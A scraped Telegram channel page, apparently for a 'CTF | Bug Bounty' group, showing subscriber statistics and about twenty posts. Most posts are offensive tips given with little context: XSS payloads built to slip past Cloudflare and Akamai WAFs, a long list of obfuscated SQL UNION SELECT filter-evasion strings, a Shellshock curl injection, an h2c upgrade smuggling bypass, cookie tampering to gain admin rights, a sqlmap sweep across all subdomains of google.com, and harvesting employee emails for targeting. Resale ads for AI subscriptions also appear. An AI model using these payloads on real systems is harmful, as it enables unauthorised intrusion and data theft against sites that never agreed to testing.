fa
Feedback
CTF | Bug Bounty

CTF | Bug Bounty

رفتن به کانال در Telegram

🔐 Join Us for 🔐 🌐 CTF Resources 🌐 Bug Bounty Resources 🌐 CTF Challenges and More Join now: https://t.me/ctftm 👤 Owner: Team Matrix ᴅᴍᴄᴀ/ᴄᴏᴘʏʀɪɢʜᴛ ᴄʟᴀɪᴍ : @Dmcatm Admin Contact: @Teammatrixs_bot

نمایش بیشتر
8 335
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-117 روز
-24330 روز

در حال بارگیری داده...

جذب مشترکین
آوریل '26
آوریل '26
+7
در 0 کانال‌ها
مارس '26
+44
در 0 کانال‌ها
Get PRO
فوریه '26
+88
در 0 کانال‌ها
Get PRO
ژانویه '26
+59
در 0 کانال‌ها
Get PRO
دسامبر '25
+33
در 0 کانال‌ها
Get PRO
نوامبر '25
+53
در 0 کانال‌ها
Get PRO
اکتبر '25
+52
در 0 کانال‌ها
Get PRO
سپتامبر '25
+58
در 0 کانال‌ها
Get PRO
اوت '25
+64
در 0 کانال‌ها
Get PRO
ژوئیه '25
+190
در 0 کانال‌ها
Get PRO
ژوئن '25
+101
در 0 کانال‌ها
Get PRO
مه '25
+152
در 0 کانال‌ها
Get PRO
آوریل '25
+434
در 0 کانال‌ها
Get PRO
مارس '25
+162
در 0 کانال‌ها
Get PRO
فوریه '25
+115
در 0 کانال‌ها
Get PRO
ژانویه '25
+121
در 0 کانال‌ها
Get PRO
دسامبر '24
+160
در 1 کانال‌ها
Get PRO
نوامبر '24
+118
در 0 کانال‌ها
Get PRO
اکتبر '24
+214
در 0 کانال‌ها
Get PRO
سپتامبر '24
+196
در 0 کانال‌ها
Get PRO
اوت '24
+145
در 1 کانال‌ها
Get PRO
ژوئیه '24
+43
در 1 کانال‌ها
Get PRO
ژوئن '24
+70
در 1 کانال‌ها
Get PRO
مه '24
+88
در 0 کانال‌ها
Get PRO
آوریل '24
+58
در 0 کانال‌ها
Get PRO
مارس '24
+150
در 0 کانال‌ها
Get PRO
فوریه '24
+124
در 0 کانال‌ها
Get PRO
ژانویه '24
+98
در 0 کانال‌ها
Get PRO
دسامبر '23
+95
در 0 کانال‌ها
Get PRO
نوامبر '23
+73
در 2 کانال‌ها
Get PRO
اکتبر '23
+125
در 0 کانال‌ها
Get PRO
سپتامبر '23
+470
در 0 کانال‌ها
Get PRO
اوت '23
+223
در 0 کانال‌ها
Get PRO
ژوئیه '23
+113
در 0 کانال‌ها
Get PRO
ژوئن '23
+85
در 0 کانال‌ها
Get PRO
مه '23
+58
در 0 کانال‌ها
Get PRO
آوریل '23
+44
در 0 کانال‌ها
Get PRO
مارس '23
+141
در 0 کانال‌ها
Get PRO
فوریه '23
+93
در 0 کانال‌ها
Get PRO
ژانویه '23
+117
در 0 کانال‌ها
Get PRO
دسامبر '22
+116
در 0 کانال‌ها
Get PRO
نوامبر '22
+124
در 0 کانال‌ها
Get PRO
اکتبر '22
+217
در 0 کانال‌ها
Get PRO
سپتامبر '22
+160
در 0 کانال‌ها
Get PRO
اوت '22
+78
در 0 کانال‌ها
Get PRO
ژوئیه '22
+98
در 0 کانال‌ها
Get PRO
ژوئن '22
+86
در 0 کانال‌ها
Get PRO
مه '22
+89
در 0 کانال‌ها
Get PRO
آوریل '22
+128
در 0 کانال‌ها
Get PRO
مارس '22
+86
در 0 کانال‌ها
Get PRO
فوریه '22
+360
در 0 کانال‌ها
Get PRO
ژانویه '22
+77
در 0 کانال‌ها
Get PRO
دسامبر '21
+1 682
در 0 کانال‌ها
Get PRO
نوامبر '21
+129
در 0 کانال‌ها
Get PRO
اکتبر '21
+173
در 0 کانال‌ها
Get PRO
سپتامبر '21
+290
در 0 کانال‌ها
Get PRO
اوت '21
+308
در 0 کانال‌ها
Get PRO
ژوئیه '21
+1 065
در 0 کانال‌ها
Get PRO
ژوئن '21
+2 192
در 0 کانال‌ها
Get PRO
مه '21
+728
در 0 کانال‌ها
Get PRO
آوریل '21
+1 148
در 0 کانال‌ها
Get PRO
مارس '21
+1 395
در 0 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
05 آوریل+2
04 آوریل+2
03 آوریل+1
02 آوریل+1
01 آوریل+1
پست‌های کانال
🔥 Perplexity 1-Year Subscription! - ChatGPT, Gemini AI – All Modules Unlocked - Activated in Your Own Email - Price: 2000 BDT - Available Slots: Only 3 — Extremely Limited! 📥 Order Now on WhatsApp: wa.me/8801303818319

2
🔥 ৪ বছরের জন্য ওয়েব হোস্টিং এখন মাত্র $74.88! 💥 আগের দাম ছিল $621.60, এখন পাচ্ছেন ৯০% ছাড়ে! ⏰ অফার শেষ হতে মাত্র ১৮ ঘণ্টা ব
🔥 ৪ বছরের জন্য ওয়েব হোস্টিং এখন মাত্র $74.88! 💥 আগের দাম ছিল $621.60, এখন পাচ্ছেন ৯০% ছাড়ে! ⏰ অফার শেষ হতে মাত্র ১৮ ঘণ্টা বাকি! যারা নতুন ওয়েবসাইট শুরু করতে চান বা পুরনো হোস্টিং আপগ্রেড করতে চান — Hostinger নিয়ে এলো Black Friday Special Deal! আপনার যা যা পাবেন: ✅ ২৫টি ওয়েবসাইট হোস্ট করার সুযোগ ✅ Free SSL Certificate ✅ ২৫ GB SSD Storage ✅ ৪ বছরের জন্য নিশ্চিন্ত হোস্টিং ✅ Free Domain Name 💲মোট মূল্য: $74.88 (৪ বছরের জন্য) এই দারুণ ছাড় পেতে ব্যবহার করুন আমার রেফারেল লিংকঃ 🔗 https://hostinger.com?REFERRALCODE=KIJTEAMTHEM6 বিশেষ বোনাস: ✅ ব্ল্যাক ফ্রাইডে ডিলে সর্বোচ্চ ডিসকাউন্ট ✅ এছাড়াও, Hostinger-এর অন্য সব হোস্টিং প্ল্যানেও পাবেন অতিরিক্ত ২০% ছাড় যদি আমার রেফারেল লিংক ব্যবহার করেন! এখনই কিনে ফেলুন — এই সুযোগ আর আসবে না!
632
3
Bug Bounty Pro Tip: #H2C Upgrade Bypass Target: Applications using HTTP/2 Cleartext (h2c) upgrades. The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2. How to Test: 1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx). 2. Send an initial HTTP/1.1 request with the upgrade header: GET / HTTP/1.1 Host: example.com Upgrade: h2c Connection: Upgrade 3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2. 4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls. Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
927
4
400TK Discount! Today Special Offer! 🚀 ChatGPT – 1 Month Subscription Offer! 💰 Offer Price: 1100 TK 📧 Personal Account – on your own email ✅ 📦 Available Slots: 20 Only – Limited Stock! 📥 Order Now on WhatsApp: wa.me/8801303818319
1 105
5
New bug bounty target! Check out https://investaxes.com/.well-known/security.txt for details on their vulnerability disclosure program. Happy hunting!
2 038
6
NEW BUG BOUNTY PLATFORM https://www.hackprove.com/
NEW BUG BOUNTY PLATFORM  https://www.hackprove.com/
2 092
7
CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications. https://github.com/musana/CF-Hero
2 255
8
🔍 Bug Bounty Web Checklist Track your web pentesting progress by checking each subcategory. https://nemocyberworld.github.io/BugBountyCheckList/
2 163
9
Shodan Dorks https://github.com/nullfuzz-pentest/shodan-dorks
2 015
10
APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifi
APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps. GitHub: https://github.com/d78ui98/APKDeepLens
1 872
11
Xss Payload <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;”
1 050
12
bypass XSS Cloudflare WAF Encoded Payload: &#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt; Clean Payload: "><track/onerror='confirm1'> HTML entity & URL encoding: " --> &#34; > --> &gt; < --> &lt; ' --> &#x27; ` --> \%60 #Bypass #XSS #WAF
1 221
13
Bypass SQL union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ +%2F**/+Union/*!select*/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT /**/union/*!50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% /*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?<ion sel="">+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ #Bypass #SQL
961
14
Akamai WAF bypass XSS <input id=b value=javascrip> <input id=c value=t:aler> <input id=d value=t(1)> <lol           contenteditable           onbeforeinput='location=b.value+c.value+d.value'> click and write here! #WAF #Bypass
969
15
🔰 Collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees.
🔰 Collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees. GitHub: ghintel.secrets.ninja
1 417
16
🔰Download all bug bounty programs domains in scope items! Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place! 👇🏼Step 1: Download the domains.txt file 📂step 2: Extract only main/root domains cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains 📂Step 3: Extract all IP addresses: grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt Don't forget to give reactions❤️
1 503
17
A simple hunt can flip the whole game!🌀 While testing a web app, I noticed this suspicious-looking session cookie: Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg== I quickly ran it through Base64 decoding: echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d  {user:darkshadow,role:user} Wow 😳 — it's a JSON-style string in plain Base64. Time to see how deep the rabbit hole goes... I modified the role from user to admin: echo "{user:darkshadow,role:admin}" | base64  e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo= Then replaced the cookie: Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo= BOOM 💥 Instantly, we got admin access!🔥 #collected
1 445
18
Shellshock Exploit To Inject The Header By RCE. curl -H "User-Agent: () { :; }; /bin/eject" http://example.com I used /bin/eject to avoid making any demonstrative effect. You can edit.
1 410
19
Good XSS Hunting Method. echo "http://example.com" | waybackurls | gf xss | xargs -I {} python3 XSStrike/xsstrike.py -u {}
1 281
20
A Method To Get Subdomains And Scan All By SQLmap And Save Vulns. subfinder -d google.com -o subdomains.txt && sqlmap -m subdomains.txt --batch --random-agent --crawl=1 --dbs | tee sqlmap_output.txt | grep -E "available databases|[*]" > vulnerable.txt
1 226